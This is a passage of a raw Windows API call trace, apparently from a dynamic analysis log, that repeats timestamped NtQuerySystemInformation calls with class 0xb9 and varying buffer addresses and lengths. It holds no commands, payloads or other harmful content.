(SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0284.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0284.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0284.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0284.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0284.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0284.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0284.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0284.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0284.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0284.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0284.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x28, ResultLength=0x0) [0284.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0284.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0284.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x20, ResultLength=0x0) [0284.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0284.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0284.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0284.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0284.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0284.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0284.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0284.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0284.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0284.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.456] NtQuerySystemInformation 